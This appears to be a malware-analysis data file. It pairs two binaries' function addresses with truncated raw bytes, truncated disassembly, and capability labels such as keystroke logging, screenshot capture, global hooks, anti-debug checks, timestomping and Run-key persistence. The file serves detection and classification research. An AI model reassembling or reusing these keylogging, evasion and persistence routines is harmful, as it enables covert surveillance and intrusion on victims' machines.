[ "push ebp", "mov ebp, esp", "add esp, 0xfffffda0", "push ebx", "xor edx, edx", "mov dword [ebp - 0x260], edx", "mov dword [ebp - 4], eax", "xor eax, eax", "push ebp", "push 0x44dbc7", "push dword fs:[eax]", "mov dword fs:[eax], esp", "mov eax, dword [ebp - 4]", "cmp dword [eax + 0x34], 0",...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x44e558
[ "Create thread", "Set global application hook" ]
51a1500b490080b8a5000000007562833d680b490000751ae8af83fbff506a00b814e54400506a03e8678cfbffa3680b4900833d640b49000075126a006a006a006a00e8d482fbffa3640b4900833d6c0b490000751b546a006a0068b8e4440068e80300006a00e8c882fbffa36c0b49005ac3
[ "push ecx", "mov eax, dword [0x490b50]", "cmp byte [eax + 0xa5], 0", "jne 0x44e5c9", "cmp dword [0x490b68], 0", "jne 0x44e58a", "call sub.kernel32.dll_GetCurrentThreadId_1", "push eax", "push 0", "mov eax, 0x44e514", "push eax", "push 3", "call sub.user32.dll_SetWindowsHookExA", "mov dword...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x44ec5c
[ "Enumerate gui resources" ]
535683c4f88bd8a1500b4900837830000f849400000083bb94000000000f85810000008b4330890424885424048bc45068eceb4400e8ce81fbff8b839000000083780800745e6a038b44240450e81683fbff8bf08934246aec56e81983fbffa8087407c70424feffffff8b83900000008b70084e83fe007c2b68130200006a006a006a006a008b442414508bd68b8390000000e894a6fcff50e8e284fbff4e83...
[ "push ebx", "push esi", "add esp, 0xfffffff8", "mov ebx, eax", "mov eax, dword [0x490b50]", "cmp dword [eax + 0x30], 0", "je 0x44ed06", "cmp dword [ebx + 0x94], 0", "jne 0x44ed00", "mov eax, dword [ebx + 0x30]", "mov dword [esp], eax", "mov byte [esp + 4], dl", "mov eax, esp", "push eax", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x44f864
[ "Get graphical window text" ]
535681c400ffffff8bf28bd880bba400000000742068000100008d442404508b433050e86077fbff8bc88bd48bc6e8f14cfbffeb0d8bc68b938c000000e8464cfbff81c4000100005e5bc3
[ "push ebx", "push esi", "add esp, 0xffffff00", "mov esi, edx", "mov ebx, eax", "cmp byte [ebx + 0xa4], 0", "je 0x44f899", "push pe_nt_image_headers32", "lea eax, [esp + 4]", "push eax", "mov eax, dword [ebx + 0x30]", "push eax", "call sub.user32.dll_GetWindowTextA", "mov ecx, eax", "mov ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x450a60
[ "Hide graphical window" ]
53568bd88bb38400000085f674338bc6e8cfcc000084c074288b8384000000e8e8c9000050e8d265fbff85c074136a008b8384000000e8d1c9000050e86b67fbff5e5bc3
[ "push ebx", "push esi", "mov ebx, eax", "mov esi, dword [ebx + 0x84]", "test esi, esi", "je 0x450aa1", "mov eax, esi", "call fcn.0045d744", "test al, al", "je 0x450aa1", "mov eax, dword [ebx + 0x84]", "call fcn.0045d46c", "push eax", "call sub.user32.dll_IsWindowVisible", "test eax, eax"...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x4547a0
[ "Log keystrokes via polling" ]
558bec83c4d85356578bf08d7df7a5a58955f033c08945e8833db40b4900000f842a0100006a11e83827fbff66a900800f95c08b1514f348008b123282b40000000f8408010000a1b80b49008b10ff5208a1b40b49008b58084b85db0f8cbc0000004333ff8bd7a1b40b4900e8774bfcff8945ec8b45ec3b45f00f84960000008b45ec80b8a6010000000f84860000008b45ec8b10ff525084c0747a8b45ece8...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffd8", "push ebx", "push esi", "push edi", "mov esi, eax", "lea edi, [ebp - 9]", "movsd dword es:[edi], dword [esi]", "movsd dword es:[edi], dword [esi]", "mov dword [ebp - 0x10], edx", "xor eax, eax", "mov dword [ebp - 0x18], eax", "cmp dword [0...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x457ef0
[ "Log keystrokes via polling" ]
558bec81c4ecfeffff5356578bda8bf0f6461c1074368bc6e8e7effeff8945ec837dec0074268b45ec83b85002000000741a8bcb8b45ec8b80500200008bd68b38ff572484c00f853f0100008b033d0001000072373d0801000077308bc6e8a1effeff8945ec837dec000f84120100008bcb8bd68b45ec8b38ff97f000000084c00f8504010000e9f60000008b033d000200000f82d20000003d0a0200000f87...
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffeec", "push ebx", "push esi", "push edi", "mov ebx, edx", "mov esi, eax", "test byte [esi + 0x1c], 0x10", "je 0x457f3c", "mov eax, esi", "call fcn.00446ef4", "mov dword [ebp - 0x14], eax", "cmp dword [ebp - 0x14], 0", "je 0x457f3c", "mov eax...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x45b5fc
[ "Capture screenshot" ]
558bec83c4945356578bf28bd880bbf8010000007406837e0400742df643550175198bc3e877ebffff85c0750e8bd68bc38b08ff51f0e91e0100008bd68bc3e8e0faffffe9100100006a00e880b8faff8bf88d55a48bc38b08ff51448b45b0508d55948bc38b08ff51448b459c5057e8b4b4faff8945f8576a00e8a1bafaff6a00e8aab4faff8945fc8b45f8508b45fc50e81ab6faff8945f433c055684eb745...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffff94", "push ebx", "push esi", "push edi", "mov esi, edx", "mov ebx, eax", "cmp byte [ebx + 0x1f8], 0", "je 0x45b618", "cmp dword [esi + 4], 0", "je 0x45b645", "test byte [ebx + 0x55], 1", "jne 0x45b637", "mov eax, ebx", "call fcn.0045a19c", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x461e6c
[ "Link many functions at runtime" ]
558bec5153a118f5480080780c000f84590100006800800000e8fa4bfaff8945fc33c05568d21f460064ff30648920833dc40b490000751c68e01f4600e8ce4afaff8bd868e81f460053e8c94afaffa3c40b4900833d3cde4800000f85ee00000068f81f4600e8654bfaffa33cde4800833d3cde4800000f84d20000006804204600a13cde480050e88b4afaffa3c80b49006814204600a13cde480050e8764a...
[ "push ebp", "mov ebp, esp", "push ecx", "push ebx", "mov eax, dword [0x48f518]", "cmp byte [eax + 0xc], 0", "je 0x461fd9", "push 0x8000", "call sub.kernel32.dll_SetErrorMode", "mov dword [ebp - 4], eax", "xor eax, eax", "push ebp", "push 0x461fd2", "push dword fs:[eax]", "mov dword fs:[e...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x463508
[ "Log keystrokes", "Log keystrokes via polling" ]
558bec81c4fcfeffff538bda668945fe8bc3e8790ffaff6a0033c08a45fe50e8703bfaffc1e01085c0742468000100008d95fefeffff5250e8b739faff8bc38d95fefeffffb900010000e8b111faff5b8be55dc3
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffefc", "push ebx", "mov ebx, edx", "mov word [ebp - 2], ax", "mov eax, ebx", "call fcn.00404498", "push 0", "xor eax, eax", "mov al, byte [ebp - 2]", "push eax", "call sub.user32.dll_MapVirtualKeyA", "shl eax, 0x10", "test eax, eax", "je 0x46...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x4704e0
[ "Check for software breakpoints" ]
538bd8817b14ca00000075228bc3e8a10a0000837b4000740ec74314cf000000b8010000005bc3c74314cb000000817b14cb00000075688b93b4010000837a1000744e837b080074078bc38b5008ff128bc38b90b4010000ff1285c0750433c05bc383f802742a837b080074d683f80374034875ce8b5308ff42048b4a048b43083b48087cbd8b9340010000015008ebb28b8b90000000898b98000000eb1e81...
[ "push ebx", "mov ebx, eax", "cmp dword [ebx + 0x14], 0xca", "jne 0x47050e", "mov eax, ebx", "call fcn.00470f94", "cmp dword [ebx + 0x40], 0", "je 0x470507", "mov dword [ebx + 0x14], 0xcf", "mov eax, 1", "pop ebx", "ret", "mov dword [ebx + 0x14], 0xcb", "cmp dword [ebx + 0x14], 0xcb", "jn...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x480fbc
[ "Encrypt data using rc4 ksa" ]
558bec83c4ac535657894df48955f88945fc8b45fc8b40048b55fc0fb7520ef7eae852fbffff8945e08b45e00500d4000005004000008945d48b45d4e8dbc1feff8945c455685314480064ff3500000000648925000000008b45fc8b40048b55fcf76a0803c0e8b1c1feff8945c055683614480064ff3500000000648925000000008b45c48945b4ba00c000008b45c4e8efc1feff8945b8ba00d400008b45c4...
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffac", "push ebx", "push esi", "push edi", "mov dword [ebp - 0xc], ecx", "mov dword [ebp - 8], edx", "mov dword [ebp - 4], eax", "mov eax, dword [ebp - 4]", "mov eax, dword [eax + 4]", "mov edx, dword [ebp - 4]", "movzx edx, word [edx + 0xe]", "i...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48b6ac
[ "Enumerate gui resources" ]
558bec83c4f053565733c9894df4894df08955f88945fc33c055689cb7480064ff306489208b45f88b10ff5244b201a168714100e8b77ff7ff8b55fc89425833c055687ab7480064ff306489208b45fc506884b14800e85db7f7ff8b45fc8b40588b10ff52148bf04e85f67c484633db8d4df08b45fc8b40588bd38b38ff570c8b45f0e848d3f7ff8bd08d4df48b45fce86b0000008b45f4508b45fc8b40588b...
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff0", "push ebx", "push esi", "push edi", "xor ecx, ecx", "mov dword [ebp - 0xc], ecx", "mov dword [ebp - 0x10], ecx", "mov dword [ebp - 8], edx", "mov dword [ebp - 4], eax", "xor eax, eax", "push ebp", "push 0x48b79c", "push dword fs:[eax]", ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48b998
[ "Enumerate gui resources", "Terminate process" ]
558bec83c4f853837d0c007508837d08007671eb027e6d8b5d08536a0068ff0f1f00e8a5b0f7ff8945fc53689cb04800e897b4f7ff837dfc00764d33d2556815ba480064ff3264892268f40100008b45fc50e8ddb0f7ff85c0740b6a008b45fc50e8b6b0f7ff33c05a59596489106820ba48008b45fc50e848aef7ffc3c645fb018a45fb5b59595dc20800
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffff8", "push ebx", "cmp dword [ebp + 0xc], 0", "jne 0x48b9ad", "cmp dword [ebp + 8], 0", "jbe 0x48ba1c", "jmp 0x48b9af", "jle 0x48ba1c", "mov ebx, dword [ebp + 8]", "push ebx", "push 0", "push 0x1f0fff", "call sub.kernel32.dll_OpenProcess", "...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48bb98
[ "Get hostname" ]
5381c47cffffff8bda8d44240433c9ba80000000e82b75f7ffc7042480000000548d44240850e851adf7ff8bc38d542404b980000000e8358bf7ff81c4840000005bc3
[ "push ebx", "add esp, 0xffffff7c", "mov ebx, edx", "lea eax, [esp + 4]", "xor ecx, ecx", "mov edx, 0x80", "call fcn.004030dc", "mov dword [esp], 0x80", "push esp", "lea eax, [esp + 8]", "push eax", "call sub.kernel32.dll_GetComputerNameA", "mov eax, ebx", "lea edx, [esp + 4]", "mov ecx, ...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48bfc8
[ "Check for time delay via gettickcount" ]
53566830c048006844c04800e8a3aef7ff8bd885db760f6a006a00687f0b000053e8eeb0f7ffe8c9a9f7ff8bf085db762f6830c048006844c04800e874aef7ff8bd8a114f348008b00e88e3bfcffe8a1a9f7ff2bc63d983a0000770485db77d18bc35e5bc3
[ "push ebx", "push esi", "push 0x48c030", "push 0x48c044", "call sub.user32.dll_FindWindowA", "mov ebx, eax", "test ebx, ebx", "jbe 0x48bfee", "push 0", "push 0", "push 0xb7f", "push ebx", "call sub.user32.dll_PostMessageA", "call sub.kernel32.dll_GetTickCount", "mov esi, eax", "test eb...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48c160
[ "Create process on windows" ]
558bec83c4a8538955fc8b45fce8d687f7ff33c05568f5c1480064ff306489208d45b833c9ba44000000e84d6ff7ff8d45a833c9ba10000000e83e6ff7ffc745b8440000008d45fcba0cc24800e8ae85f7ff8d45a8508d45b8506a006a0068200200006a006a006a008b45fce88787f7ff506a00e8aba6f7ff83f8011bdb4333c05a595964891068fcc148008d45fce8a482f7ffc3
[ "push ebp", "mov ebp, esp", "add esp, 0xffffffa8", "push ebx", "mov dword [ebp - 4], edx", "mov eax, dword [ebp - 4]", "call fcn.00404948", "xor eax, eax", "push ebp", "push 0x48c1f5", "push dword fs:[eax]", "mov dword fs:[eax], esp", "lea eax, [ebp - 0x48]", "xor ecx, ecx", "mov edx, 0x...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48c24c
[ "Get common file path" ]
558bec81c478feffff5333d289957cffffff899578feffff8bd833c055680ec3480064ff306489208bc3e81d82f7ff8d458033c9ba80000000e8526ef7ff68800000008d458050e83ca7f7ff85c0764e8d8578feffff8d5580b980000000e85984f7ff8b8578feffffe89e86f7ff8bd08d857cfeffffe8096ff7ff8d957cfeffff8d857cffffffe82484f7ff8b957cffffff8bc3b924c34800e8ba84f7ff33c0...
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffe78", "push ebx", "xor edx, edx", "mov dword [ebp - 0x84], edx", "mov dword [ebp - 0x188], edx", "mov ebx, eax", "xor eax, eax", "push ebp", "push 0x48c30e", "push dword fs:[eax]", "mov dword fs:[eax], esp", "mov eax, ebx", "call fcn.00404498"...
005ab06a1f7b7adf12c2d6ed4e7dc41ead78703ba7f539d2bad6e457e6bd17e7
0x48c328
[ "Get common file path" ]
558bec81c478feffff5333d289957cffffff899578feffff8bd833c05568eac3480064ff306489208bc3e84181f7ff8d458033c9ba80000000e8766df7ff68800000008d458050e828a6f7ff85c0764e8d8578feffff8d5580b980000000e87d83f7ff8b8578feffffe8c285f7ff8bd08d857cfeffffe82d6ef7ff8d957cfeffff8d857cffffffe84883f7ff8b957cffffff8bc3b900c44800e8de83f7ff33c0...
[ "push ebp", "mov ebp, esp", "add esp, 0xfffffe78", "push ebx", "xor edx, edx", "mov dword [ebp - 0x84], edx", "mov dword [ebp - 0x188], edx", "mov ebx, eax", "xor eax, eax", "push ebp", "push 0x48c3ea", "push dword fs:[eax]", "mov dword fs:[eax], esp", "mov eax, ebx", "call fcn.00404498"...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x401670
[ "Initialize winsock library" ]
81ec900100008d442400568bf1506802020000c706ccb54000ff1580b3400033c08946048946088bc65e81c490010000c3
[ "sub esp, 0x190", "lea eax, [esp]", "push esi", "mov esi, ecx", "push eax", "push 0x202", "mov dword [esi], 0x40b5cc", "call dword [sym.imp.WS2_32.dll_WSAStartup]", "xor eax, eax", "mov dword [esi + 4], eax", "mov dword [esi + 8], eax", "mov eax, esi", "pop esi", "add esp, 0x190", "ret" ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x401760
[ "Set socket configuration" ]
51568bf18b460485c0740a83f8ff7405e86b0000008b44240c6a0085c074046a01eb026a026a02ff1574b3400083f8ff894604743b8b4c2410578b3d78b340008d5424086a0452680610000068ffff000050894c241cffd78b4e048d4424086a0450680510000068ffff000051ffd75f8b4e0433c083f9ff5e0f95c059c20800
[ "push ecx", "push esi", "mov esi, ecx", "mov eax, dword [esi + 4]", "test eax, eax", "je 0x401775", "cmp eax, 0xffffffff", "je 0x401775", "call fcn.004017e0", "mov eax, dword [esp + 0xc]", "push 0", "test eax, eax", "je 0x401783", "push 1", "jmp 0x401785", "push 2", "push 2", "call...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x401810
[ "Resolve dns" ]
538b5c24088bcb33c0568b742410890185f689410489410889410c750a6affff1584b34000eb3c56ff1558b3400085c074250fbf480a8b500c578d7b048b328bd1c1e902f3a58bca83e103f3a4668b40085f668903eb1456ff1568b3400083f8ff741f89430466c70302008b4c241451ff156cb34000668943025eb8010000005bc35e33c05bc3
[ "push ebx", "mov ebx, dword [esp + 8]", "mov ecx, ebx", "xor eax, eax", "push esi", "mov esi, dword [esp + 0x10]", "mov dword [ecx], eax", "test esi, esi", "mov dword [ecx + 4], eax", "mov dword [ecx + 8], eax", "mov dword [ecx + 0xc], eax", "jne 0x401837", "push 0xffffffffffffffff", "call...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x4018a0
[ "Connect socket" ]
83ec10568bf18b460485c0740c8b460885c07405e827ffffff8b44241c8b4c2418508d5424085152c7460800000000e83cffffff83c40c85c074198b4e048d4424046a105051ff1564b34000f7d81bc0408946088b46085e83c410c20800
[ "sub esp, 0x10", "push esi", "mov esi, ecx", "mov eax, dword [esi + 4]", "test eax, eax", "je 0x4018b9", "mov eax, dword [esi + 8]", "test eax, eax", "je 0x4018b9", "call fcn.004017e0", "mov eax, dword [esp + 0x1c]", "mov ecx, dword [esp + 0x18]", "push eax", "lea edx, [esp + 8]", "push ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x401930
[ "Receive data", "Receive data on socket" ]
568bf18b460885c074188b44240c8b4c24088b56046a00505152ff155cb34000eb048b44240c85c075038946085ec20800
[ "push esi", "mov esi, ecx", "mov eax, dword [esi + 8]", "test eax, eax", "je 0x401952", "mov eax, dword [esp + 0xc]", "mov ecx, dword [esp + 8]", "mov edx, dword [esi + 4]", "push 0", "push eax", "push ecx", "push edx", "call dword [sym.imp.WS2_32.dll_recv]", "jmp 0x401956", "mov eax, dw...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x401ed0
[ "Read data from internet", "Receive data" ]
8b5424088b490c8d442408508b442408525051ff1534b3400085c0750683c8ffc208008b442408c20800
[ "mov edx, dword [esp + 8]", "mov ecx, dword [ecx + 0xc]", "lea eax, [esp + 8]", "push eax", "mov eax, dword [esp + 8]", "push edx", "push eax", "push ecx", "call dword [sym.imp.WININET.dll_InternetReadFile]", "test eax, eax", "jne 0x401ef3", "or eax, 0xffffffff", "ret 8", "mov eax, dword [...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x402c40
[ "Read file on windows" ]
8b442404566864d1400050ff15b4b240008bf083c40885f6745153578b7c241c85ff740f8b0f6a005156ff1564b2400083c40c8b5424188b44241456526a0150ff1568b2400083c4108bd885ff740c56ff156cb2400083c404890756ff15acb2400083c4048bc35f5b5ec333c05ec3
[ "mov eax, dword [esp + 4]", "push esi", "push 0x40d164", "push eax", "call dword [sym.imp.MSVCRT.dll_fopen]", "mov esi, eax", "add esp, 8", "test esi, esi", "je 0x402cab", "push ebx", "push edi", "mov edi, dword [esp + 0x1c]", "test edi, edi", "je 0x402c73", "mov ecx, dword [edi]", "pu...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x402d80
[ "Write file on windows" ]
64a1000000006aff6846a4400050b8bc42020064892500000000e8817300005355568bf18d4c241089742438e8bfe8ffff8bac24d84202006a0333db6a2055899c24dc420200e885f6ffff83c60483c40c8bcee868e8ffff6a3268000100008bcee85ae7ffff68701700006a018d4c2418e86ae9ffff85c00f84bd0b00006a6e558d4c2418e896eaffff85c00f84a90b0000578bbc24f442020085ff740e803f...
[ "mov eax, dword fs:[0]", "push 0xffffffffffffffff", "push 0x40a446", "push eax", "mov eax, 0x242bc", "mov dword fs:[0], esp", "call fcn.0040a120", "push ebx", "push ebp", "push esi", "mov esi, ecx", "lea ecx, [esp + 0x10]", "mov dword [esp + 0x38], esi", "call fcn.00401670", "mov ebp, dw...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x4044a0
[ "Query or enumerate registry value" ]
83ec088b542410538b5c241056578bf98d44240c8d4c2410508b470453516a005250c744242800000000c744242404000000ff1508b040008bf085f675128b4f088b13505152e865e3ffff83c40c89038bc65f5e5b83c408c20800
[ "sub esp, 8", "mov edx, dword [esp + 0x10]", "push ebx", "mov ebx, dword [esp + 0x10]", "push esi", "push edi", "mov edi, ecx", "lea eax, [esp + 0xc]", "lea ecx, [esp + 0x10]", "push eax", "mov eax, dword [edi + 4]", "push ebx", "push ecx", "push 0", "push edx", "push eax", "mov dwor...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x404500
[ "Query or enumerate registry value" ]
83ec08535556578b7c24248bf185ffc744241400000000c74424100004000074068b07894424108b6c241c8b4424208d4c24108d542414518b4e0455526a005051ff1508b0400085ff8bd874068b542410891785db75188b460885c074118b078a4e0850515355e864e3ffff83c4105f5e8bc35d5b83c408c20c00
[ "sub esp, 8", "push ebx", "push ebp", "push esi", "push edi", "mov edi, dword [esp + 0x24]", "mov esi, ecx", "test edi, edi", "mov dword [esp + 0x14], 0", "mov dword [esp + 0x10], 0x400", "je 0x404527", "mov eax, dword [edi]", "mov dword [esp + 0x10], eax", "mov ebp, dword [esp + 0x1c]", ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x404580
[ "Set registry value" ]
568bf18b4c24086a008b46085051e8bde2ffff8b4e0483c40c8d542408894424088b44240c6a04526a046a005051ff1500b040005ec20800
[ "push esi", "mov esi, ecx", "mov ecx, dword [esp + 8]", "push 0", "mov eax, dword [esi + 8]", "push eax", "push ecx", "call fcn.00402850", "mov ecx, dword [esi + 4]", "add esp, 0xc", "lea edx, [esp + 8]", "mov dword [esp + 8], eax", "mov eax, dword [esp + 0xc]", "push 4", "push edx", "...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x4045c0
[ "Set registry value" ]
568bf1578b7c240c8b460885c0740e6a00506a0157e8f6e2ffff83c41057ff1584b040008b4c24108b56044050576a016a005152ff1500b040005f5ec20800
[ "push esi", "mov esi, ecx", "push edi", "mov edi, dword [esp + 0xc]", "mov eax, dword [esi + 8]", "test eax, eax", "je 0x4045dd", "push 0", "push eax", "push 1", "push edi", "call fcn.004028d0", "add esp, 0x10", "push edi", "call dword [sym.imp.KERNEL32.dll_lstrlenA]", "mov ecx, dword ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x404600
[ "Check os version" ]
81ec94000000538b9c249c000000555657b92500000033c08d7c2410f3ab85dbc744241094000000bd630000007420bff8d2400083c9fff2aef7d12bf98bc18bf78bfbc1e902f3a58bc883e103f3a48d4c241051ff1588b0400085c00f84090100008b4c24148b4424208b54241883f904754685d2752083f8020f849300000085dbbd0a0000000f84de000000bff0d24000e98b00000083fa5a75228b442420...
[ "sub esp, 0x94", "push ebx", "mov ebx, dword [esp + 0x9c]", "push ebp", "push esi", "push edi", "mov ecx, 0x25", "xor eax, eax", "lea edi, [esp + 0x10]", "rep stosd dword es:[edi], eax", "test ebx, ebx", "mov dword [esp + 0x10], 0x94", "mov ebp, 0x63", "je 0x40464f", "mov edi, 0x40d2f8",...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x404780
[ "Terminate process" ]
81ec280900008b84243409000053558bac2434090000565785c0c7442414000000007e0e85ed0f847e030000c6450000eb2285ed7406807d000075188b84244009000085c00f845f0300008338000f84560300006854d34000ff15a0b040008bd885db895c24280f84f40200008b359cb040006844d3400053ffd66830d34000538bf8ffd66818d340005389442428ffd68bf085ff897424240f84bb0200008b...
[ "sub esp, 0x928", "mov eax, dword [esp + 0x934]", "push ebx", "push ebp", "mov ebp, dword [esp + 0x934]", "push esi", "push edi", "test eax, eax", "mov dword [esp + 0x14], 0", "jle 0x4047b2", "test ebp, ebp", "je 0x404b2a", "mov byte [ebp], 0", "jmp 0x4047d4", "test ebp, ebp", "je 0x40...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x404b40
[ "Terminate process" ]
81ec380100005355568bac24480100005733f6b94900000033c08d7c242489742420f3ab8b842454010000897424103bc67e0e3bee0f84ec020000c6450000eb213bee7406807d000075178b8424500100003bc60f84cd02000039300f84c5020000689cd34000c744242428010000ff15a0b040008bd83bde895c24140f84950200008b359cb040006880d3400053ffd66870d34000538bf8ffd68bd88b4424...
[ "sub esp, 0x138", "push ebx", "push ebp", "push esi", "mov ebp, dword [esp + 0x148]", "push edi", "xor esi, esi", "mov ecx, 0x49", "xor eax, eax", "lea edi, [esp + 0x24]", "mov dword [esp + 0x20], esi", "rep stosd dword es:[edi], eax", "mov eax, dword [esp + 0x154]", "mov dword [esp + 0x10...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x405000
[ "Check if file exists", "Get file attributes" ]
8b44240450ff15a8b0400033c983f8ff0f95c18bc1c3
[ "mov eax, dword [esp + 4]", "push eax", "call dword [sym.imp.KERNEL32.dll_GetFileAttributesA]", "xor ecx, ecx", "cmp eax, 0xffffffff", "setne cl", "mov eax, ecx", "ret" ]
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x405240
[ "Copy file", "Create process on windows" ]
81ec0c020000538b1d9cb24000558bac2418020000565733ff6814d1400055897c2418ffd383c40885c00f84650200008d44241c68ff0000005057ff1550b0400085c00f844c0200008b35b8b240008d4c241c6a5c51ffd683c40885c00f8432020000682cd44000ff15a0b040008bf885ff897c24140f840a0200006814d4400057ff159cb0400085c0894424180f84eb0100008bbc242402000085ff0f8501...
[ "sub esp, 0x20c", "push ebx", "mov ebx, dword [sym.imp.MSVCRT.dll_strstr]", "push ebp", "mov ebp, dword [esp + 0x218]", "push esi", "push edi", "xor edi, edi", "push 0x40d114", "push ebp", "mov dword [esp + 0x18], edi", "call ebx", "add esp, 8", "test eax, eax", "je 0x4054d5", "lea eax...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x4054f0
[ "Read file on windows", "Set file attributes", "Timestomp file", "Write file on windows" ]
81ecb4040000535556578bbc24c804000033ed3bfd896c2424896c2428896c242c74366a5c57ff1598b2400083c40885c0742683c9ff33c0f2aef7d12bf98d9424c00000008bc18bf78bfac1e902f3a58bc883e103f3a4eb148d8c24c000000068ff0000005155ff1550b040008d5424386a018d8424c40000005250ff1544b040008bf03bf574198d4c24308d54242451555256ff1540b0400056ff153cb040...
[ "sub esp, 0x4b4", "push ebx", "push ebp", "push esi", "push edi", "mov edi, dword [esp + 0x4c8]", "xor ebp, ebp", "cmp edi, ebp", "mov dword [esp + 0x24], ebp", "mov dword [esp + 0x28], ebp", "mov dword [esp + 0x2c], ebp", "je 0x405549", "push 0x5c", "push edi", "call dword [sym.imp.MSVC...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x4058a0
[ "Delete file", "Get common file path", "Persist via run registry key" ]
6aff687ba4400064a100000000506489250000000081ec2c030000535556578d4c2410e848eaffff8b8c245803000033c03bc889842444030000c744243002000080c7442434010000808944241c0f843e0500008d44243c68ff00000050ff1564b040008b2d80b040008b1d20b0400085c00f847a010000bfb0dd400083c9ff33c08d54243cf2aef7d12bf9508bf78bfa8bd183c9fff2ae8bca4fc1e902f3a5...
[ "push 0xffffffffffffffff", "push 0x40a47b", "mov eax, dword fs:[0]", "push eax", "mov dword fs:[0], esp", "sub esp, 0x32c", "push ebx", "push ebp", "push esi", "push edi", "lea ecx, [esp + 0x10]", "call fcn.00404310", "mov ecx, dword [esp + 0x358]", "xor eax, eax", "cmp ecx, eax", "mov...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x4061b0
[ "Delete file", "Get common file path", "Move file" ]
6aff689ba4400064a100000000506489250000000081ec0c0200005556578d4c240ce839e1ffff8d44241868ff00000050c784242802000000000000ff1560b04000bf3cd4400083c9ff33c08d542418f2aef7d12bf9508bf78be98bfa83c9fff2ae8bcd4fc1e902f3a58bcd8d54241c83e10350f3a4bf95d4400083c9fff2aef7d12bf9683f000f008bf78be98bfa83c9fff2ae8bcd4fc1e902f3a58bcd5083...
[ "push 0xffffffffffffffff", "push 0x40a49b", "mov eax, dword fs:[0]", "push eax", "mov dword fs:[0], esp", "sub esp, 0x20c", "push ebp", "push esi", "push edi", "lea ecx, [esp + 0xc]", "call fcn.00404310", "lea eax, [esp + 0x18]", "push 0xff", "push eax", "mov dword [esp + 0x228], 0", "...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x406700
[ "Create directory", "Create process on windows", "Get common file path" ]
81ec000100008d44240053565768ff00000050ff1564b040006a00e8e0deffff83c40483f8148d54240c7c37bf4cde400083c9ff33c068afd44000f2aef7d12bf98bf78bd98bfa83c9fff2ae8bcb4fc1e902f3a58bcb83e103f3a4ff1574b24000eb35bf40de400083c9ff33c068afd44000f2aef7d12bf98bf78bd98bfa83c9fff2ae8bcb4fc1e902f3a58bcb83e103f3a4ff1578b2400083c4048d44240c6a...
[ "sub esp, 0x100", "lea eax, [esp]", "push ebx", "push esi", "push edi", "push 0xff", "push eax", "call dword [sym.imp.KERNEL32.dll_GetWindowsDirectoryA]", "push 0", "call fcn.00404600", "add esp, 4", "cmp eax, 0x14", "lea edx, [esp + 0xc]", "jl 0x406763", "mov edi, 0x40de4c", "or ecx, ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x406b30
[ "Delete file", "Get common file path" ]
